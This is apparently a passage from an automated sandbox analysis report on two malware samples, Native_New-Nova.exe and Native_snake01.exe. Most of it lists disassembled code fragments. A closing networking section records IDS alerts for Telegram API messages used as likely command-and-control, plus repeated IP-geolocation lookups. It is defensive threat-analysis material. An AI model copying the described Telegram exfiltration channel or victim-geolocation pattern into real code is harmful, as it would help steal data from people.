                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFE718h10_2_05DFE470
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFE2C0h10_2_05DFE018
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF5CCAh10_2_05DF5C18
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF5CCAh10_2_05DF5C20
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFDE68h10_2_05DFDBC0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFDA10h10_2_05DFD768
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFFCD0h10_2_05DFFA28
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E751ADh10_2_05E74FD0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E75B37h10_2_05E74FD0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E73840h10_2_05E73598
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_05E744D1
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E70740h10_2_05E70498
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E726E0h10_2_05E72438
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then mov esp, ebp10_2_05E787C0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E719D8h10_2_05E71730
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E7144Ah10_2_05E711A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E733E8h10_2_05E73140
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E702E8h10_2_05E70040
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E70FF0h10_2_05E70D48
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E72F90h10_2_05E72CE8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E72288h10_2_05E71FE0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E740F0h10_2_05E73E48
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E73C98h10_2_05E739F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E70B98h10_2_05E708F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E72B38h10_2_05E72890
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E71E30h10_2_05E71B88
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]10_2_06181684
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]10_2_061852E0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 022BF9C0h12_2_022BFA0F
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 022BF9C0h12_2_022BFA81
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 022BF9C0h12_2_022BF820
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061C2D5Ch12_2_061C2AA8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061C3326h12_2_061C2F08
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061CD09Ch12_2_061CCDF0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061C3326h12_2_061C3254
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061CD4F4h12_2_061CD248
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_061C0676
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061CD94Ch12_2_061CD6A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061CDDA4h12_2_061CDAF8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061C0D10h12_2_061C0B30
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061C16FBh12_2_061C0B30
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061CE1FCh12_2_061CDF50
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061CE654h12_2_061CE3A8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061CEAACh12_2_061CE800
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061CEF04h12_2_061CEC58
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_061C0856
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_061C0040
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061CF35Ch12_2_061CF0B0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061CF7B4h12_2_061CF508
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 061CFC0Ch12_2_061CF960
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B96F3h12_2_063B9420
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B8320h12_2_063B7FE0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B62E4h12_2_063B6038
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B9F0Ah12_2_063B9C38
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BCCFAh12_2_063BCA28
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BFAEAh12_2_063BF818
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B32B4h12_2_063B3008
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BACD2h12_2_063BAA00
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BBF32h12_2_063BBC60
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B370Ch12_2_063B3460
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B1CFCh12_2_063B1A50
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BED22h12_2_063BEA50
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B02ECh12_2_063B0040
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B3B64h12_2_063B38B8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B2154h12_2_063B1EA8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BB16Ah12_2_063BAE98
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B0744h12_2_063B0498
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B673Ch12_2_063B6490
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BDF5Ah12_2_063BDC88
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B712Ch12_2_063B6E80
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B4D2Ch12_2_063B4A80
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BC3CAh12_2_063BC0F8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B0B9Ch12_2_063B08F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B6B96h12_2_063B68E8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BF1BAh12_2_063BEEE8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B5184h12_2_063B4ED8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B7584h12_2_063B72D8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BA3A2h12_2_063BA0D0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BD192h12_2_063BCEC0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B55DCh12_2_063B5330
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B79DCh12_2_063B7730
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BB602h12_2_063BB330
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BE3F2h12_2_063BE120
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B25ACh12_2_063B2300
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BA83Ah12_2_063BA568
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B2A04h12_2_063B2758
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BD62Ah12_2_063BD358
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B0FF4h12_2_063B0D48
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BE88Ah12_2_063BE5B8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B2E5Ch12_2_063B2BB0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B144Ch12_2_063B11A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BC862h12_2_063BC590
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B7E34h12_2_063B7B88
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B5A34h12_2_063B5788
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BF652h12_2_063BF380
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B18A4h12_2_063B15F8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BDAC2h12_2_063BD7F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063B5E8Ch12_2_063B5BE0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 063BBA9Ah12_2_063BB7C8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_0641F841
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_0641F888
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_0641FBA1
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06425323h12_2_06425028
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642F5BBh12_2_0642F2C0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642D43Bh12_2_0642D140
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06420312h12_2_06420040
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06426643h12_2_06426348
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06424322h12_2_06424050
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642914Bh12_2_06428E50
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642BC53h12_2_0642B958
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06422C2Ah12_2_06422958
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06421532h12_2_06421260
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642E75Bh12_2_0642E460
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06427963h12_2_06427668
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642A46Bh12_2_0642A170
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642CF73h12_2_0642CC78
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642ADFBh12_2_0642AB00
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642D903h12_2_0642D608
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06426B0Bh12_2_06426810
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06429613h12_2_06429318
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 064239F2h12_2_06423720
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642C11Bh12_2_0642BE20
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642EC23h12_2_0642E928
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 064222FAh12_2_06422028
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06420C02h12_2_06420930
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06427E2Bh12_2_06427B30
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642A933h12_2_0642A638
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06422792h12_2_064224C0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 064287BBh12_2_064284C0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642109Ah12_2_06420DC8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642B2C3h12_2_0642AFC8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642DDCBh12_2_0642DAD0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06420782h12_2_064204D8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06426FD3h12_2_06426CD8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06429ADBh12_2_064297E0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 064247BAh12_2_064244E8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642C5E3h12_2_0642C2E8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642F0ECh12_2_0642EDF0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 064257EBh12_2_064254F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 064230C2h12_2_06422DF0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 064219CAh12_2_064216F8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 064282F3h12_2_06427FF8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642617Bh12_2_06425E80
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06424CF3h12_2_06424980
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642355Bh12_2_06423288
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06428C83h12_2_06428988
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642FA83h12_2_0642F788
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06421E62h12_2_06421B90
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642B78Bh12_2_0642B490
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642E293h12_2_0642DF98
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642749Bh12_2_064271A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06429FA3h12_2_06429CA8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0642CAABh12_2_0642C7B0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06423E8Ah12_2_06423BB8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06425CB3h12_2_064259B8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06450CCBh12_2_064509D0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 0645033Bh12_2_06450040
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then jmp 06450803h12_2_06450508
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then mov ecx, 000003E8h12_2_0648E190
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_06483168
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then mov ecx, 000003E8h12_2_0648E18E
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_0648315A
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then push 00000000h12_2_067FF588
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 4x nop then push 00000000h12_2_067FDFE9
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h18_2_0216E228
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 051B9109h18_2_051B8E58
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 051B9860h18_2_051B9430
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 051B9860h18_2_051B978E
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF508Dh18_2_05DF4D50
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFF780h18_2_05DFF4D8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF7750h18_2_05DF74A8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF4749h18_2_05DF44A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFEED0h18_2_05DFEC28
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFEA78h18_2_05DFE7D0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF3A41h18_2_05DF3798
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF6A48h18_2_05DF67A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFE1C8h18_2_05DFDF20
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFD918h18_2_05DFD670
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF7BA8h18_2_05DF7900
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFFBD8h18_2_05DFF930
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF4BA1h18_2_05DF48F8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFF328h18_2_05DFF080
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF72F8h18_2_05DF7050
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF42F1h18_2_05DF4048
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF6EA0h18_2_05DF6BF8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF3E99h18_2_05DF3BF0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF65F0h18_2_05DF6348
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFE620h18_2_05DFE378
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF5BD2h18_2_05DF5B28
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF5BD2h18_2_05DF5AD7
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFDD70h18_2_05DFDAC8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E751ADh18_2_05E74FD0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E75B37h18_2_05E74FD0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E73840h18_2_05E73598
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h18_2_05E744D0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E70740h18_2_05E70498
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E726E0h18_2_05E72438
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then mov esp, ebp18_2_05E787C9
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E719D8h18_2_05E71730
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E7144Ah18_2_05E711A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E733E8h18_2_05E73140
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E702E8h18_2_05E70040
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E70FF0h18_2_05E70D48
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E72F90h18_2_05E72CE8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E72288h18_2_05E71FE0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E740F0h18_2_05E73E48
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E73C98h18_2_05E739F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E70B98h18_2_05E708F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E72B38h18_2_05E72890
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05E71E30h18_2_05E71B88
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]18_2_061856B0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]18_2_061856E8

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49753 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49759 -> 149.154.167.220:443
                      Uses the Telegram API (likely for C&C communication)
                      Source: unknownDNS query: name: api.telegram.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
